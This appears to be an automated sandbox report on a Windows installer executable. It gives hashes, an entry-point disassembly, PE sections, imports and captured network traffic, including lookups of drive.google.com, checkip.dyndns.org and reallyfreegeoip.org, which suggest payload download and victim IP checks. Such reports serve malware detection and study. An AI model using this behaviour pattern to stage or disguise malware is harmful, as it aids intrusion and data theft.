Thumbprint MD5: 47524D31775CB63F7BA06F3F807F1BC6
Thumbprint SHA-1: E024E316DA4C8377688667F5BBECFD51E8826A71
Thumbprint SHA-256: AC88AA71E85112494F127C4B14D5B661BF65EC7D5EAD358D3C27EB36C9E9BF7B
Serial: 7AD51E07EB00FA068078A5354208798EF1B97B71
Instruction:
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F7CB444C803h
push ebx
call 00007F7CB444F789h
cmp eax, ebx
je 00007F7CB444C7F9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F7CB444F705h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F7CB444C7DDh
push ebp
push 00000009h
call 00007F7CB444F75Ch
push 00000007h
call 00007F7CB444F755h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007F7CB444F37Fh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007F7CB444F36Dh
push ebx
call dword ptr [00407154h]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x7428          | 0xa0         | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x33000         | 0x2a638      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0xf5ba8         | 0xa20        |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x7000          | 0x298        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x5dc5       | 0x5e00   | a23d2965909b5f64725fd24c7252001b | False    | 0.6685089760638298 | data      | 6.4711273116718715 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000          | 0x1246       | 0x1400   | 6389f916226544852e494114faf192ad | False    | 0.4271484375       | data      | 5.0003960999706765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x9000          | 0x1a818      | 0x400    | 72dcd89e8824ae186467be61797ed81e | False    | 0.6474609375       | data      | 5.220595003364983  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000         | 0xf000       | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                  | empty     | 0.0                | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x33000         | 0x2a638      | 0x2a800  | 211c5a6f63a6a60eafa4bce2fdc2eb37 | False    | 0.4163775275735294 | data      | 5.182849595658975  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name          | RVA     | Size    | Type                                                                                  | Language | Country       | ZLIB Complexity
RT_ICON       | 0x333a0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584                   | English  | United States | 0.3621495327102804
RT_ICON       | 0x43bc8 | 0x94a8  | Device independent bitmap graphic, 96 x 192 x 32, image size 38016                    | English  | United States | 0.4262665545511877
RT_ICON       | 0x4d070 | 0x5488  | Device independent bitmap graphic, 72 x 144 x 32, image size 21600                    | English  | United States | 0.452449168207024
RT_ICON       | 0x524f8 | 0x4228  | Device independent bitmap graphic, 64 x 128 x 32, image size 16896                    | English  | United States | 0.4430798299480397
RT_ICON       | 0x56720 | 0x25a8  | Device independent bitmap graphic, 48 x 96 x 32, image size 9600                      | English  | United States | 0.5049792531120332
RT_ICON       | 0x58cc8 | 0x10a8  | Device independent bitmap graphic, 32 x 64 x 32, image size 4224                      | English  | United States | 0.5705909943714822
RT_ICON       | 0x59d70 | 0xea8   | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English  | United States | 0.6202025586353944
RT_ICON       | 0x5ac18 | 0x988   | Device independent bitmap graphic, 24 x 48 x 32, image size 2400                      | English  | United States | 0.6536885245901639
RT_ICON       | 0x5b5a0 | 0x8a8   | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English  | United States | 0.7030685920577617
RT_ICON       | 0x5be48 | 0x6c8   | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors  | English  | United States | 0.646889400921659
RT_ICON       | 0x5c510 | 0x568   | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors  | English  | United States | 0.4884393063583815
RT_ICON       | 0x5ca78 | 0x468   | Device independent bitmap graphic, 16 x 32 x 32, image size 1088                      | English  | United States | 0.7402482269503546
RT_DIALOG     | 0x5cee0 | 0x100   | data                                                                                  | English  | United States | 0.5234375
RT_DIALOG     | 0x5cfe0 | 0x11c   | data                                                                                  | English  | United States | 0.6056338028169014
RT_DIALOG     | 0x5d100 | 0x60    | data                                                                                  | English  | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5d160 | 0xae    | data                                                                                  | English  | United States | 0.632183908045977
RT_MANIFEST   | 0x5d210 | 0x425   | XML 1.0 document, ASCII text, with very long lines (1061), with no line terminators   | English  | United States | 0.5127238454288408
DLL | Import
KERNEL32.dll | CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jul 24, 2024 14:45:26.889498949 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.889766932 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.890880108 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.891057968 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.891138077 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.891338110 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.893680096 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.893851042 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.893925905 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.894085884 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.896549940 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.896739960 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.896799088 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.897016048 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.899277925 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.899451017 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.899509907 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.899770975 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.902192116 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.902374029 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.902431011 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.902623892 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.904952049 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.905136108 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.905196905 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.905348063 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.907619953 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.907785892 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.907845020 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.908060074 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.910419941 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.910653114 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.910710096 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.910963058 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.913105011 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.913276911 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.913362980 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.913600922 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.913655996 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.913903952 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.915891886 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.916066885 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.916135073 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.916290998 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.918493986 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.918680906 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.918737888 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.919049978 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.921116114 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.921327114 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.921403885 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.921689987 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.921708107 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.921910048 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.921983004 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.922049999 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:27.380126953 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:27.542834997 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:27.543119907 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:27.543334007 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:27.705984116 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:27.810448885 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:27.814985991 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:27.977740049 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:27.983994961 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:28.031986952 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:28.537688971 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:28.537784100 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:28.538037062 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:28.541382074 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:28.541444063 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:28.773380041 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:28.773627043 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:28.774974108 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:28.774986982 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:28.775255919 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:28.777838945 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:28.820230961 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:29.373573065 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:29.373819113 CEST44349782172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:29.373986959 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:29.374866962 CEST49782443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:29.384762049 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:29.548726082 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:29.550601959 CEST49783443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:29.550635099 CEST44349783172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:29.550770998 CEST49783443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:29.550976992 CEST49783443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:29.550993919 CEST44349783172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:29.593879938 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:29.781558990 CEST44349783172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:29.782980919 CEST49783443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:29.783021927 CEST44349783172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:30.374654055 CEST44349783172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:30.375140905 CEST44349783172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:30.375360966 CEST49783443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:30.375638008 CEST49783443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:30.377794981 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:30.541811943 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:30.542478085 CEST49784443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:30.542566061 CEST44349784172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:30.542828083 CEST49784443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:30.542974949 CEST49784443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:30.543025970 CEST44349784172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:30.593749046 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:30.777321100 CEST44349784172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:30.778618097 CEST49784443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:30.778635025 CEST44349784172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.053039074 CEST44349784172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.053503036 CEST44349784172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.053654909 CEST49784443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.053993940 CEST49784443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.056204081 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:31.219908953 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:31.220602989 CEST49785443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.220700979 CEST44349785172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.220952988 CEST49785443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.221080065 CEST49785443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.221133947 CEST44349785172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.265513897 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:31.455007076 CEST44349785172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.456293106 CEST49785443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.456365108 CEST44349785172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.744334936 CEST44349785172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.744815111 CEST44349785172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.745018959 CEST49785443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.745244026 CEST49785443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.747342110 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:31.945415020 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:31.946202040 CEST49786443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.946299076 CEST44349786172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.946530104 CEST49786443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.946737051 CEST49786443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:31.946795940 CEST44349786172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:31.999741077 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:32.176716089 CEST44349786172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.178138018 CEST49786443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.178158998 CEST44349786172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.449337006 CEST44349786172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.449894905 CEST44349786172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.450093031 CEST49786443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.450314045 CEST49786443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.452363968 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:32.617572069 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:32.620364904 CEST49787443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.620399952 CEST44349787172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.620698929 CEST49787443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.620825052 CEST49787443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.620841980 CEST44349787172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.671407938 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:32.851180077 CEST44349787172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:32.852441072 CEST49787443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:32.852458000 CEST44349787172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.120320082 CEST44349787172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.120512962 CEST44349787172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.120636940 CEST49787443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.120867968 CEST49787443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.123032093 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:33.288347006 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:33.289309978 CEST49788443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.289436102 CEST44349788172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.289647102 CEST49788443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.289881945 CEST49788443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.289957047 CEST44349788172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.343188047 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:33.525391102 CEST44349788172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.526711941 CEST49788443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.526731968 CEST44349788172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.803175926 CEST44349788172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.803514957 CEST44349788172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.803719997 CEST49788443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.803941011 CEST49788443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.806164026 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:33.970061064 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:33.970844984 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.970968008 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.971163034 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.971380949 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.971446991 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.014883995 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:34.201443911 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.202763081 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:34.202785969 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.474658966 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.475120068 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.475414038 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:34.475544930 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:46:38.969155073 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:46:38.969547033 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:47:13.977932930 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:47:14.141292095 CEST8049781158.101.44.242192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 24, 2024 14:45:23.342375994 CEST | 54088 | 53 | 192.168.11.20 | 1.1.1.1
Jul 24, 2024 14:45:23.452994108 CEST | 53 | 54088 | 1.1.1.1 | 192.168.11.20
Jul 24, 2024 14:45:24.015728951 CEST | 59951 | 53 | 192.168.11.20 | 1.1.1.1
Jul 24, 2024 14:45:24.126194000 CEST | 53 | 59951 | 1.1.1.1 | 192.168.11.20
Jul 24, 2024 14:45:27.264785051 CEST | 62034 | 53 | 192.168.11.20 | 1.1.1.1
Jul 24, 2024 14:45:27.376019955 CEST | 53 | 62034 | 1.1.1.1 | 192.168.11.20
Jul 24, 2024 14:45:28.423943996 CEST | 56595 | 53 | 192.168.11.20 | 1.1.1.1
Jul 24, 2024 14:45:28.537071943 CEST | 53 | 56595 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 24, 2024 14:45:23.342375994 CEST | 192.168.11.20 | 1.1.1.1 | 0x9de4 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:24.015728951 CEST | 192.168.11.20 | 1.1.1.1 | 0x769c | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:27.264785051 CEST | 192.168.11.20 | 1.1.1.1 | 0xe37f | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:28.423943996 CEST | 192.168.11.20 | 1.1.1.1 | 0xd26b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 24, 2024 14:45:23.452994108 CEST | 1.1.1.1 | 192.168.11.20 | 0x9de4 | No error (0) | drive.google.com | | 142.251.167.113 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:23.452994108 CEST | 1.1.1.1 | 192.168.11.20 | 0x9de4 | No error (0) | drive.google.com | | 142.251.167.101 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:23.452994108 CEST | 1.1.1.1 | 192.168.11.20 | 0x9de4 | No error (0) | drive.google.com | | 142.251.167.102 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:23.452994108 CEST | 1.1.1.1 | 192.168.11.20 | 0x9de4 | No error (0) | drive.google.com | | 142.251.167.138 | A (IP address) | IN (0x0001) | false
